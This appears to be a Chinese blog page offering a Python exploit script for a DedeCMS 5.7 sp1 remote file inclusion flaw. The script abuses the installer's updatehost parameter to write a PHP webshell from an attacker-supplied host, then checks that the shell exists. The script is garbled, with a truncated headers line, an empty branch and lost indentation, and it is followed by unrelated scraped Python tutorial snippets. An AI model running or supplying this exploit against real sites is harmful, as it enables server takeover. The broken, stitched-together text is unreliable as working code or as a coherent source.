針對織夢5.7 sp1遠端檔案包含getshell exp編寫,漏洞分析請檢視網上分析,不再贅述。
exp
# -*- coding:utf-8 -*-
import requests
import time
def dada(url):
url_index=url+"/install/index.php"
(khtml, like gecko) chrome/51.0. 2704.103 safari/537.36"}
try:
url_request=requests.get(url_index,headers)
time.sleep(3)
if(url_request.status_code==200):
print("漏洞檔案存在,開始測試")
time.sleep(5)
url_url = url + "/install/index.php?step=11&inslockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php" # 重置其引數
print(url_url)
requests.get(url=url_url, headers=headers) # 傳送重置請求
# time.sleep(2)
url_url2 = url + "/install/index.php?step=11&inslockfile=a&s_lang=x&install_demo_name=../data/test.php&updatehost=" # 換成存在demodata.x.txt位址
print(url_url2)
requests.get(url=url_url2, headers=headers) # 傳送exp
url_exp = url + "/data/test.php"
url_final = requests.get(url=url_exp, headers=headers)
if url_final.status_code == 200:
else:
print("測試失敗,請人工測試")
else:
print("檢測完成,該漏洞不存在")
except:
print("error:請檢測網路或者url位址")
#print(url)
if __name__ == '__main__':
dada("dede/dedecms")
python學習詳解 Python學習之字典詳解
在元組和列表中,都是通過編號進行元素的訪問,但有的時候我們按名字進行資料甚至資料結構的訪問,在c 中有map的概念,也就是對映,在python中也提供了內建的對映型別 字典。對映其實就是一組key和value以及之間的對映函式,其特點是 key的唯一性 key與value的一對多的對映。1.字典的建...
Python學習之函式
0 引論 函式是實現 復用的主要途徑之一,而且函式的使用也可以使得程式更加容易理解,更加規範化。程式很多時候並不是給計算機的,而是給人看的。這裡總結一下python中的函式的應用 1 函式 首先python中的函式的格式是怎樣的。def 函式名 形參 函式體 下面是乙個計算fibonacci數列的函...
python學習之函式
抽象 斐波那契數列 fibs 0,1 for i in range 10 print fibs fibs 0,1 i 2 while i 20 i 1 print fibs 使用callable判斷函式是否可以呼叫 import math x 1 y math.sqrt print callable...